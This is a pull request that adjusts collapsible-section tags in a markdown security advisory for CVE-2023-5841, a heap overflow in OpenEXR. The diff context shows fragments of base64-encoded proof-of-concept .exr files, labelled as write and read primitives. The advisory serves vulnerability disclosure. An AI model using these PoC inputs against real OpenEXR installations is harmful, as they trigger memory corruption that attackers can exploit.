### PR TITLE
Only one expand section allowed per page. Dang.

### DIFF
--- a/cves/CVE-2023-5841.md
+++ b/cves/CVE-2023-5841.md
@@ -226,9 +226,9 @@ src/lib/OpenEXRUtil/ImfCheckFile.cpp
 
 Multiple .exr files which triggers the above described heap overflow can be found below.
 
-Write primitive from heap overflow:
-
 [expand]
+
+Write primitive from heap overflow:
 
 ```
 di8xAQIAAABjb21wcmVzc2lvbgBjb21wcmVzc2lvbgABAAAAAHR5cGUAc3RyaW5nAA0AAABkZWVw
@@ -254,12 +254,8 @@ rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
 rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq4=
 ```
 
-[/expand]
-
 Alternatively, a read primitive can be achieved leveraging the same bug with
 the following PoC:
-
-[expand]
 
 ```
 di8xAQIAAABnAAARASYmJiYmJiYmJian5EBnr2S1zEBAQEBAQEBAzn0nDH6dyiPFuFBpSulKZm5u


### PR DESCRIPTION
Consolidated the expand tags down to one expandable section. Kinda sucks a little but at least it works as expected now.